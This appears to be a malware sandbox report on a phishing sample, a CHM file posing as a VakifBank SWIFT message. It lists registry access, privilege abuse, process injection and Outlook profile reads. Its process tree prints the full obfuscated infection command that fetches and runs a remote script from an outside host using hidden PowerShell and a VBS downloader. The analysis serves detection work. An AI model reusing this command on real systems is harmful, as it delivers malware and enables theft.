Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	SensorDataService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	SensorDataService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	SensorDataService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	SensorDataService.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	TieringEngineService.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	TieringEngineService.exe

Kills process with taskkill 1 IoCs

defense_evasion

pid	Process
4988	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-912 = "HTML Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\acppage.dll,-6005 = "Shortcut to MS-DOS Program"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{A38B883C-1682-497E-97B0-0A3A9E801682} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000064b0ec11e570db01	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{3DBEE9A1-C471-4B95-BBCA-F39310064458} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000001b76f111e570db01	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{F81B1B56-7613-4EE4-BC05-1FAB5DE5C07E} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000bac2ff11e570db01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-24585 = "Cascading Style Sheet Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-10046 = "Internet Shortcut"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\MPEG2Demultiplexer	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{33154C99-BF49-443D-A73C-303A23ABBE97} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000b79a1712e570db01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32,@elscore.dll,-6 = "Microsoft Cyrillic to Latin Transliteration"	SearchIndexer.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9926 = "M3U file"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32,@elscore.dll,-5 = "Microsoft Transliteration Engine"	SearchIndexer.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{01BE4CFB-129A-452B-A209-F9D40B3B84A5} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000085828012e570db01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@windows.storage.dll,-21825 = "3D Objects"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\msxml3r.dll,-1 = "XML Document"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Multimedia	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-142 = "Microsoft OneNote Table Of Contents"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Multimedia\ActiveMovie	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-177 = "Microsoft PowerPoint Macro-Enabled Slide Show"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-172 = "Microsoft PowerPoint 97-2003 Slide Show"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@fxsresm.dll,-1133 = "Print"	fxssvc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-101 = "Microsoft Excel Worksheet"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E2FB4720-F45F-4A3C-8CB2-2060E12425C3} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000001ead4912e570db01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9905 = "Video Clip"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32,@elscore.dll,-2 = "Microsoft Script Detection"	SearchIndexer.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32,@elscore.dll,-10 = "Microsoft Hangul Decomposition Transliteration"	SearchIndexer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9935 = "MPEG-2 TS Video"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.shtml	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-176 = "Microsoft PowerPoint Macro-Enabled Presentation"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9933 = "MPEG-4 Audio"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-114 = "OpenDocument Spreadsheet"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32,@elscore.dll,-3 = "Microsoft Traditional Chinese to Simplified Chinese Transliteration"	SearchIndexer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-126 = "Microsoft Word Macro-Enabled Template"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{5383EF74-273B-4278-AB0C-CDAA9FD5369E} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000072e56312e570db01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@fxsresm.dll,-1134 = "Microsoft Routing Extension"	fxssvc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@fxsresm.dll,-1132 = "Store in a folder"	fxssvc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@windows.storage.dll,-34583 = "Saved Pictures"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-194 = "Microsoft Excel Add-In"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-140 = "Microsoft OneNote Section"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-107 = "Microsoft Excel Comma Separated Values File"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@fxsresm.dll,-1131 = "Route through e-mail"	fxssvc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9902 = "Movie Clip"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9934 = "AVCHD Video"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mht	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-914 = "SVG Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32,@elscore.dll,-7 = "Microsoft Devanagari to Latin Transliteration"	SearchIndexer.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9932 = "MP4 Video"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32,@elscore.dll,-8 = "Microsoft Malayalam to Latin Transliteration"	SearchIndexer.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Common Files\system\wab32res.dll,-10100 = "Contacts"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	SearchProtocolHost.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	28	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	24	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3988	powershell.exe
3988	powershell.exe
3504	powershell.exe
3504	powershell.exe
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
1560	aken.pif
1560	aken.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif
4852	svchost.pif

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
660	Process not Found
660	Process not Found
660	Process not Found

Suspicious use of AdjustPrivilegeToken 47 IoCs

description	pid	Process
Token: SeDebugPrivilege	3988	powershell.exe
Token: SeDebugPrivilege	3504	powershell.exe
Token: SeDebugPrivilege	4988	taskkill.exe
Token: SeDebugPrivilege	1560	aken.pif
Token: SeTakeOwnershipPrivilege	3104	itimtjqI.pif
Token: SeDebugPrivilege	3104	itimtjqI.pif
Token: SeAuditPrivilege	5060	fxssvc.exe
Token: SeRestorePrivilege	4004	TieringEngineService.exe
Token: SeManageVolumePrivilege	4004	TieringEngineService.exe
Token: SeAssignPrimaryTokenPrivilege	3284	AgentService.exe
Token: SeBackupPrivilege	4144	vssvc.exe
Token: SeRestorePrivilege	4144	vssvc.exe
Token: SeAuditPrivilege	4144	vssvc.exe
Token: SeBackupPrivilege	4388	wbengine.exe
Token: SeRestorePrivilege	4388	wbengine.exe
Token: SeSecurityPrivilege	4388	wbengine.exe
Token: 33	1548	SearchIndexer.exe
Token: SeIncBasePriorityPrivilege	1548	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1548	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1548	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1548	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1548	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1548	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1548	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1548	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1548	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1548	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1548	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1548	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1548	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1548	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1548	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1548	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1548	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1548	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1548	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1548	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1548	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1548	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1548	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1548	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	1548	SearchIndexer.exe
Token: SeDebugPrivilege	3104	itimtjqI.pif
Token: SeDebugPrivilege	3104	itimtjqI.pif
Token: SeDebugPrivilege	3104	itimtjqI.pif
Token: SeDebugPrivilege	3104	itimtjqI.pif
Token: SeDebugPrivilege	3104	itimtjqI.pif

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
3732	hh.exe
3732	hh.exe
3104	itimtjqI.pif

Suspicious use of WriteProcessMemory 56 IoCs

description	pid	Process	procid_target
PID 3732 wrote to memory of 4728	3732	hh.exe	83
PID 3732 wrote to memory of 4728	3732	hh.exe	83
PID 4728 wrote to memory of 1192	4728	cmd.exe	85
PID 4728 wrote to memory of 1192	4728	cmd.exe	85
PID 4728 wrote to memory of 3988	4728	cmd.exe	86
PID 4728 wrote to memory of 3988	4728	cmd.exe	86
PID 3988 wrote to memory of 1820	3988	powershell.exe	87
PID 3988 wrote to memory of 1820	3988	powershell.exe	87
PID 4728 wrote to memory of 3504	4728	cmd.exe	88
PID 4728 wrote to memory of 3504	4728	cmd.exe	88
PID 3504 wrote to memory of 2120	3504	powershell.exe	89
PID 3504 wrote to memory of 2120	3504	powershell.exe	89
PID 4728 wrote to memory of 4988	4728	cmd.exe	91
PID 4728 wrote to memory of 4988	4728	cmd.exe	91
PID 2120 wrote to memory of 628	2120	cmd.exe	93
PID 2120 wrote to memory of 628	2120	cmd.exe	93
PID 2120 wrote to memory of 2960	2120	cmd.exe	95
PID 2120 wrote to memory of 2960	2120	cmd.exe	95
PID 2120 wrote to memory of 2960	2120	cmd.exe	95
PID 2960 wrote to memory of 3016	2960	x.exe	106
PID 2960 wrote to memory of 3016	2960	x.exe	106
PID 2960 wrote to memory of 3016	2960	x.exe	106
PID 2960 wrote to memory of 436	2960	x.exe	109
PID 2960 wrote to memory of 436	2960	x.exe	109
PID 2960 wrote to memory of 436	2960	x.exe	109
PID 436 wrote to memory of 4852	436	cmd.exe	112
PID 436 wrote to memory of 4852	436	cmd.exe	112
PID 4852 wrote to memory of 1544	4852	svchost.pif	113
PID 4852 wrote to memory of 1544	4852	svchost.pif	113
PID 1544 wrote to memory of 4600	1544	cmd.exe	115
PID 1544 wrote to memory of 4600	1544	cmd.exe	115
PID 1544 wrote to memory of 2552	1544	cmd.exe	116
PID 1544 wrote to memory of 2552	1544	cmd.exe	116
PID 1544 wrote to memory of 1856	1544	cmd.exe	117
PID 1544 wrote to memory of 1856	1544	cmd.exe	117
PID 1544 wrote to memory of 4540	1544	cmd.exe	118
PID 1544 wrote to memory of 4540	1544	cmd.exe	118
PID 4540 wrote to memory of 324	4540	alpha.pif	119
PID 4540 wrote to memory of 324	4540	alpha.pif	119
PID 1544 wrote to memory of 1372	1544	cmd.exe	120
PID 1544 wrote to memory of 1372	1544	cmd.exe	120
PID 1372 wrote to memory of 3112	1372	alpha.pif	121
PID 1372 wrote to memory of 3112	1372	alpha.pif	121
PID 1544 wrote to memory of 4732	1544	cmd.exe	122
PID 1544 wrote to memory of 4732	1544	cmd.exe	122
PID 4732 wrote to memory of 1560	4732	alpha.pif	123
PID 4732 wrote to memory of 1560	4732	alpha.pif	123
PID 2960 wrote to memory of 3104	2960	x.exe	125
PID 2960 wrote to memory of 3104	2960	x.exe	125
PID 2960 wrote to memory of 3104	2960	x.exe	125
PID 2960 wrote to memory of 3104	2960	x.exe	125
PID 2960 wrote to memory of 3104	2960	x.exe	125
PID 1548 wrote to memory of 2036	1548	SearchIndexer.exe	165
PID 1548 wrote to memory of 2036	1548	SearchIndexer.exe	165
PID 1548 wrote to memory of 112	1548	SearchIndexer.exe	166
PID 1548 wrote to memory of 112	1548	SearchIndexer.exe	166

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	itimtjqI.pif

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	itimtjqI.pif

C:\Windows\hh.exe
"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\VakifBank_Swift_Mesaji.chm
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3732
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe > nul && echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>C:\\Users\\Public\\aloha.vbs & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/P.cmd C:\\Users\\Public\\df.cmd" & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break" & del /q "C:\Users\Public\ript.exe" / A / F / Q / S >nul & del /q "C:\Users\Public\aloha.vbs" / A / F / Q / S >nul & taskkill /F /IM hh.exe & exit
  2⤵
  - Hide Artifacts: Hidden Window
  - Suspicious use of WriteProcessMemory
  PID:4728
- - C:\Windows\system32\extrac32.exe
    extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe
